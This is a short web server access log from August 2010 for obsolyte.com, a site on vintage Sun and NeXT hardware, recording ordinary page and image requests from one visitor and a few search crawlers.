109.165.116.162 - - [29/Aug/2010:12:45:29 -0400] "GET /images/digital_logo.gif HTTP/1.1" 200 1057 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:29 -0400] "GET /images/ipx_grain2.jpg HTTP/1.1" 200 15083 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:44 -0400] "GET /sunPICS/ HTTP/1.1" 200 17863 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:44 -0400] "GET /images/logo_small.gif HTTP/1.1" 200 4441 "http://obsolyte.com/sunPICS/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
67.195.112.30 - - [29/Aug/2010:12:45:46 -0400] "GET /sun3/kernel/sun3_160bc.html HTTP/1.0" 200 3013 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
109.165.116.162 - - [29/Aug/2010:12:45:47 -0400] "GET /sunFAQ/ HTTP/1.1" 200 8342 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:50 -0400] "GET /next/ HTTP/1.1" 200 6924 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:51 -0400] "GET /next/m_slab_rear.jpg HTTP/1.1" 200 10473 "http://obsolyte.com/next/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:51 -0400] "GET /next/m_slab_rear.gif HTTP/1.1" 200 3317 "http://obsolyte.com/next/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:52 -0400] "GET /next/next_slab.gif HTTP/1.1" 200 41328 "http://obsolyte.com/next/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:53 -0400] "GET /next/m_slab_int.jpg HTTP/1.1" 200 65257 "http://obsolyte.com/next/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
189.210.4.82 - - [29/Aug/2010:12:46:18 -0400] "GET /sunFAQ/sun-nvram.gif HTTP/1.1" 200 23578 "-" "Mozilla/4.0 (compatible;)"
109.165.116.162 - - [29/Aug/2010:12:46:20 -0400] "GET /sunPICS/classic/SpX_fr.jpg HTTP/1.1" 200 26859 "http://obsolyte.com/sunPICS/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
207.46.195.242 - - [29/Aug/2010:12:47:22 -0400] "GET /sunFAQ/411howto/ HTTP/1.1" 304 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
109.165.116.162 - - [29/Aug/2010:12:47:31 -0400] "GET /sunFAQ/sun3mousepad.html HTTP/1.1" 200 1555 "http://obsolyte.com/sunFAQ/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:47:34 -0400] "GET /sunFAQ/sparc_compare.txt HTTP/1.1" 200 9096 "http://obsolyte.com/sunFAQ/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
